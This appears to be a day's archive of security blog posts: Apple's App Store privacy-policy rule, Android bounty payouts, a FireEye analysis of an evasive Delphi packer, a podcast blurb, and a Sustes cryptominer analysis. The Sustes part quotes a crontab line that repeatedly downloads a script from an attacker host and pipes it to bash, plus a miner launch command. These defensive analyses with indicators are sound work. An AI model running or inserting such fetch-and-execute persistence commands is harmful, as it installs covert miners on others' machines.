Daily Archives: September 20, 2018

Apple to Require Privacy Policies for All New Apps and App Updates

On August 30, 2018, Apple Inc. announced a June update to its App Store Review Guidelines that will require each developer to provide its privacy policy as part of the app review process, and to include in such policy specific content requirements. Effective October 3, 2018, all new apps and app updates must include a link to the developer’s privacy policy before they can be submitted for distribution to users through the App Store or through TestFlight external testing.

The privacy policy must detail what data the app gathers, how the data will be collected and how such data will be used. The policy also must confirm that third parties with whom an app shares user data will provide the same or equal protection of user data as stated in the app’s privacy policy and the App Store Review Guidelines. Lastly, the policy must explain the developer’s data retention policy, as well as include information on how users can revoke consent to data collection or request deletion of the collected user data. Developers only will be able to edit an app’s privacy policy when submitting a new version of the app.

Android and Google Play Security Rewards Programs surpass $3M in payouts


Posted by Jason Woloz and Mayank Jain, Android Security & Privacy Team

[Cross-posted from the Android Developers Blog]

Our Android and Play security reward programs help us work with top researchers from around the world to improve Android ecosystem security every day. Thank you to all the amazing researchers who submitted vulnerability reports.


Android Security Rewards

In the ASR program's third year, we received over 470 qualifying vulnerability reports from researchers and the average pay per researcher jumped by 23%. To date, the ASR program has rewarded researchers with over $3M, paying out roughly $1M per year.
Here are some of the highlights from the Android Security Rewards program's third year:
  • There were no payouts for our highest possible reward: a complete remote exploit chain leading to TrustZone or Verified Boot compromise.
  • 99 individuals contributed one or more fixes.
  • The ASR program's reward averages were $2,600 per reward and $12,500 per researcher.
  • Guang Gong received our highest reward amount to date: $105,000 for his submission of a remote exploit chain.
As part of our ongoing commitment to security we regularly update our programs and policies based on ecosystem feedback. We also updated our severity guidelines for evaluating the impact of reported security vulnerabilities against the Android platform.


Google Play Security Rewards

In October 2017, we rolled out the Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play. So far, researchers have reported over 30 vulnerabilities through the program, earning a combined bounty amount of over $100K.
If undetected, these vulnerabilities could have potentially led to elevation of privilege, access to sensitive data and remote code execution on devices.


Keeping devices secure

In addition to rewarding for vulnerabilities, we continue to work with the broad and diverse Android ecosystem to protect users from issues reported through our program. We collaborate with manufacturers to ensure that these issues are fixed on their devices through monthly security updates. Over 250 device models have a majority of their deployed devices running a security update from the last 90 days. This table shows the models with a majority of deployed devices running a security update from the last three months:


ManufacturerDevice
ANSL50
AsusZenFone 5Z (ZS620KL/ZS621KL), ZenFone Max Plus M1 (ZB570TL), ZenFone 4 Pro (ZS551KL), ZenFone 5 (ZE620KL), ZenFone Max M1 (ZB555KL), ZenFone 4 (ZE554KL), ZenFone 4 Selfie Pro (ZD552KL), ZenFone 3 (ZE552KL), ZenFone 3 Zoom (ZE553KL), ZenFone 3 (ZE520KL), ZenFone 3 Deluxe (ZS570KL), ZenFone 4 Selfie (ZD553KL), ZenFone Live L1 (ZA550KL), ZenFone 5 Lite (ZC600KL), ZenFone 3s Max (ZC521TL)
BlackBerryBlackBerry MOTION, BlackBerry KEY2
BluGrand XL LTE, Vivo ONE, R2_3G, Grand_M2, BLU STUDIO J8 LTE
bqAquaris V Plus, Aquaris V, Aquaris U2 Lite, Aquaris U2, Aquaris X, Aquaris X2, Aquaris X Pro, Aquaris U Plus, Aquaris X5 Plus, Aquaris U lite, Aquaris U
DocomoF-04K, F-05J, F-03H
Essential ProductsPH-1
FujitsuF-01K
General MobileGM8, GM8 Go
GooglePixel 2 XL, Pixel 2, Pixel XL, Pixel
HTCU12+, HTC U11+
HuaweiHonor Note10, nova 3, nova 3i, Huawei Nova 3I, 荣耀9i, 华为G9青春版, Honor Play, G9青春版, P20 Pro, Honor V9, huawei nova 2, P20 lite, Honor 10, Honor 8 Pro, Honor 6X, Honor 9, nova 3e, P20, PORSCHE DESIGN HUAWEI Mate RS, FRD-L02, HUAWEI Y9 2018, Huawei Nova 2, Honor View 10, HUAWEI P20 Lite, Mate 9 Pro, Nexus 6P, HUAWEI Y5 2018, Honor V10, Mate 10 Pro, Mate 9, Honor 9, Lite, 荣耀9青春版, nova 2i, HUAWEI nova 2 Plus, P10 lite, nova 青春版本, FIG-LX1, HUAWEI G Elite Plus, HUAWEI Y7 2018, Honor 7S, HUAWEI P smart, P10, Honor 7C, 荣耀8青春版, HUAWEI Y7 Prime 2018, P10 Plus, 荣耀畅玩7X, HUAWEI Y6 2018, Mate 10 lite, Honor 7A, P9 Plus, 华为畅享8, honor 6x, HUAWEI P9 lite mini, HUAWEI GR5 2017, Mate 10
ItelP13
KyoceraX3
LanixAlpha_950, Ilium X520
LavaZ61, Z50
LGELG Q7+, LG G7 ThinQ, LG Stylo 4, LG K30, V30+, LG V35 ThinQ, Stylo 2 V, LG K20 V, ZONE4, LG Q7, DM-01K, Nexus 5X, LG K9, LG K11
MotorolaMoto Z Play Droid, moto g(6) plus, Moto Z Droid, Moto X (4), Moto G Plus (5th Gen), Moto Z (2) Force, Moto G (5S) Plus, Moto G (5) Plus, moto g(6) play, Moto G (5S), moto e5 play, moto e(5) play, moto e(5) cruise, Moto E4, Moto Z Play, Moto G (5th Gen)
NokiaNokia 8, Nokia 7 plus, Nokia 6.1, Nokia 8 Sirocco, Nokia X6, Nokia 3.1
OnePlusOnePlus 6, OnePlus5T, OnePlus3T, OnePlus5, OnePlus3
OppoCPH1803, CPH1821, CPH1837, CPH1835, CPH1819, CPH1719, CPH1613, CPH1609, CPH1715, CPH1861, CPH1831, CPH1801, CPH1859, A83, R9s Plus
PositivoTwist, Twist Mini
SamsungGalaxy A8 Star, Galaxy J7 Star, Galaxy Jean, Galaxy On6, Galaxy Note9, Galaxy J3 V, Galaxy A9 Star, Galaxy J7 V, Galaxy S8 Active, Galaxy Wide3, Galaxy J3 Eclipse, Galaxy S9+, Galaxy S9, Galaxy A9 Star Lite, Galaxy J7 Refine, Galaxy J7 Max, Galaxy Wide2, Galaxy J7(2017), Galaxy S8+, Galaxy S8, Galaxy A3(2017), Galaxy Note8, Galaxy A8+(2018), Galaxy J3 Top, Galaxy J3 Emerge, Galaxy On Nxt, Galaxy J3 Achieve, Galaxy A5(2017), Galaxy J2(2016), Galaxy J7 Pop, Galaxy A6, Galaxy J7 Pro, Galaxy A6 Plus, Galaxy Grand Prime Pro, Galaxy J2 (2018), Galaxy S6 Active, Galaxy A8(2018), Galaxy J3 Pop, Galaxy J3 Mission, Galaxy S6 edge+, Galaxy Note Fan Edition, Galaxy J7 Prime, Galaxy A5(2016)
Sharpシンプルスマホ4, AQUOS sense plus (SH-M07), AQUOS R2 SH-03K, X4, AQUOS R SH-03J, AQUOS R2 SHV42, X1, AQUOS sense lite (SH-M05)
SonyXperia XZ2 Premium, Xperia XZ2 Compact, Xperia XA2, Xperia XA2 Ultra, Xperia XZ1 Compact, Xperia XZ2, Xperia XZ Premium, Xperia XZ1, Xperia L2, Xperia X
TecnoF1, CAMON I Ace
VestelVestel Z20
Vivovivo 1805, vivo 1803, V9 6GB, Y71, vivo 1802, vivo Y85A, vivo 1726, vivo 1723, V9, vivo 1808, vivo 1727, vivo 1724, vivo X9s Plus, Y55s, vivo 1725, Y66, vivo 1714, 1609, 1601
VodafoneVodafone Smart N9
XiaomiMi A2, Mi A2 Lite, MI 8, MI 8 SE, MIX 2S, Redmi 6Pro, Redmi Note 5 Pro, Redmi Note 5, Mi A1, Redmi S2, MI MAX 2, MI 6X
ZTEBLADE A6 MAX

Thank you to everyone internally and externally who helped make Android safer and stronger in the past year. Together, we made a huge investment in security research that helps Android users everywhere. If you want to get involved to make next year even better, check out our detailed program rules. For tips on how to submit complete reports, see Bug Hunter University.

Increased Use of a Delphi Packer to Evade Malware Classification

Introduction

The concept of "packing" or "crypting" a malicious program is widely popular among threat actors looking to bypass or defeat analysis by static and dynamic analysis tools. Evasion of classification and detection is an arms race in which new techniques are traded and used in the wild. For example, we observe many crypting services being offered in underground forums by actors who claim to make any malware "FUD" or "Fully Undetectable" by anti-virus technologies, sandboxes and other endpoint solutions. We also see an increased effort to model normal user activity and baseline it as an effective countermeasure to fingerprint malware analysis environments.

Delphi Code to the Rescue

The samples we inspected were carrying the Delphi signature (Figure 1) and were consistent with Delphi code constructs on analyzing with IDR (Interactive Delphi Reconstructor).


Figure 1: Delphi signature in sample

The Delphi programming language can be an easy way to write applications and programs that leverage Windows API functions. In fact, some actors deliberately include the default libraries as a diversion to hamper static analysis and make the application "look legit" during dynamic analysis. Figure 2 shows the forum post of an actor discussing this technique.


Figure 2: Underground forum post of an actor discussing technique

Distribution Campaigns

We have observed many spam campaigns with different themes that drop payloads packed using this packer.

An example is an average swift transfer spam that carries a document file as an attachment (hash: 71cd5df89e3936bb39790010d6d52a2d), which leverages malicious macros to drop the payload. The spam email is shown in Figure 3.


Figure 3: Spam example 1

Another example is an average quotation themed spam that carries an exploit document file as an attachment (hash: 0543e266012d9a3e33a9688a95fce358), which leverages an equation editor vulnerability to drop the payload (Figure 4).


Figure 4: Spam example 2

The documents in the examples fetched a payload from http://5.152.203.115/win32.exe. This turned out to be Lokibot malware.

User Activity Checks

The packer goes to great lengths to ensure that it is not running in an analysis environment. Normal user activity involves many application windows being rotated or changed over a period of time. The first variant of the packer uses GetForegroundWindow API to check for the user activity of changing windows at least three times before it executes further. If it does not see the change of windows, it puts itself into an infinite sleep. The code is shown in Figure 5. Interestingly, some of the publicly available sandboxes can be detected by this simple technique.


Figure 5: Window change check

To confirm user activity, a second variant of the packer checks for mouse cursor movement using GetCursorPos and Sleep APIs, while a third variant checks for system idle state using GetLastInputInfo and GetTickCount APIs.

Extracting Real Payloads from the PE Resources

The original payload is split into multiple binary blobs and stored in various locations inside the resource directory, as shown in Figure 6.


Figure 6: Bitmap resource with encrypted contents

To locate and assemble the real payload bytes, the packer code first directly reads content from a hardcoded resource ID inside the resource section. The first 16 bytes of this form a XOR key used to decrypt rest of the bytes using rolling XOR. The decrypted bytes actually represent an internal data structure, as shown in Figure 7, used by the packer to reference encrypted and obfuscated buffers at various resource IDs.


Figure 7: Structure showing encrypted file information

The packer then reads values from the encrypted buffers, starting from dwStartResourceId to dwStartResourceId+dwNumberOfResources, and brings them to a single location by reading chunks of dwChunkSize. Once the final data buffer is prepared, it starts decrypting it using the same rolling XOR algorithm mentioned previously and the new key from the aforementioned structure, producing the core payload executable. This script can be used to extract the real payload statically.

Classification of Real Families

Many of the unpacked binaries that we were able to extract from the sample set were identified as belonging to the Lokibot malware family. We were also able to identify Pony, IRStealer, Nanocore, Netwire, Remcos, and nJRAT malware families, as well as a coin mining malware family, among others. A distribution of the malware families using the packer is shown in Figure 8. This diversity of malware families implies that many threat actors are using this "crypting" service/tool for their operations, possibly buying it from the developer itself.


Figure 8: Distribution of malware families using packer

Conclusion

Packers and crypter services provide threat actors an easy and convenient option to outsource the workload of keeping their real payloads undetected and unclassified as long as possible. They are regularly finding nifty ways to bypass sandbox environments with anti-analysis techniques; hence, detonating malware samples in a sandbox environment that try to model real user behavior is a safe bet.

FireEye MVX Engine both detects and blocks this activity.

Indicators of Compromise (IOCs)

  • 853bed3ad5cc4b1471e959bfd0ea7c7c
  • e3c421d404c08809dd8ee3365552e305
  • 14e5326c5da90cd6619b7fe1bc4a97e1
  • dc999a1a2c5e796e450c0a6a61950e3f
  • 3ad781934e67a8b84739866b0b55544b
  • b4f5e691b264103b9c4fb04fa3429f1e

Tick That Box – Enterprise Security Weekly #107

This week, Doug White and Matt Alderman talk about Big Time IT Audit Mistakes in the Enterprise! In the Enterprise News this week, Cisco aims to make security foundational throughout Its business, Fidelis looks to grow cyber-security platform, how artificial intelligence can improve human decision-making in IoT apps, Crossmatch announces the availability of DigitalPersona v3.0, and Video Fingerprinting. All that and more on this episode of Enterprise Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ES_Episode107

 

Visit https://www.securityweekly.com/esw for all the latest episodes!

 

Visit https://www.activecountermeasures/esw to sign up for a demo or buy our AI Hunter!

 

→Visit our website: https://www.securityweekly.com

→Follow us on Twitter: https://www.twitter.com/securityweekly

→Like us on Facebook: https://www.facebook.com/secweekly

Sustes Malware: CPU for Monero

Today I'd like to share a simple analysis based on fascinating threat that I like to call Sustes (you will see name genesis in a bit).

Everybody knows Monero crypto currency and probably everybody knows that it has built upon privacy, by meaning It's not that simple to figure out Monero wallet balance. Sustes (mr.sh) is a nice example of Pirate-Mining and even if it's hard to figure out its magnitude, since the attacker built-up private pool-proxies, I believe it's interesting to fix wallet address in memories and to share IoC for future Protection. So, let's have a closer look to it.

Monero stops you trying to check wallet balance
Sustes Malware doesn't infect victims by itself (it's not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget (http:\/\/192[.]99[.]142[.]226[:]8220\/mr.sh ) directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software with a bit of spicy. The following code represents the mr.sh content as a today (ref. blog post date).


An initial connection-check wants to take down unwanted software on the victim side (awk '{print $7}' | sed -e "s/\/.*//g") taking decisions upon specific IP addresses. It filters PID from connection states and it directly kills them (kill -9). The extracted attacker's unwanted communications are the following ones:
  • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
  • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
  • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
  • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
  • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
  • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
A second check comes from "command lines arguments". Sustes "greps" to search for configuration files (for example: wc.conf and wq.conf and wm.conf) then it looks for software names such as sustes (here we go !) and kills everything matches the "grep". The script follows by assigning to f2 variable the dropping website (192[.]99[.]142[.]226:8220) and later-on it calls "f2" adding specific paths (for example: /xm64 and wt.conf) in order to drop crafted components. MR.sh follows by running the dropped software with configuration file as follows:

nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &

MR.SH ends up by setting a periodic crontab action on dropping and executing itself by setting up:

crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1"

Following the analysis and extracting the configuration file from dropping URL we might observe the Monero wallet addresses and the Monero Pools used by attacker. The following wallets (W1, W2, W3) were found.

  • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
Quick analyses on the used Monero pools took me to believe the attacker built up a custom  and private (deployed on private infrastructures) monero pool/proxies, for such a reason I believe it would be nice to monitor and/or block the following addresses:
  • 158[.]69[.]133[.]20 on port 3333
  • 192[.]99[.]142[.]249 on port 3333
  • 202[.]144[.]193[.]110 on port 3333 
The downloaded payload is named sustes and it is a basic XMRIG, which is a well-known opensource miner. In this scenario it is used to make money at the expense of computer users by abusing the infected computer to mine Monero, a cryptocurrency. The following image shows the usage strings as an initial proof of software.

XMRIG prove 1

Many people are currently wondering what is the sustes process which is draining a lot of PC resources (for example: here, here and here ) .... now we have an answer: it's a unwanted Miner. :D.

Hope you had fun


IoC
  • IP Address:
    • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
    • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
    • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
    • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
    • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
    • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
  • Custom Monero Pools:
    • 158[.]69[.]133[.]20:3333
    • 192[.]99[.]142[.]249:3333
    • 202[.]144[.]193[.]110:3333 
  • Wallets:
    • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg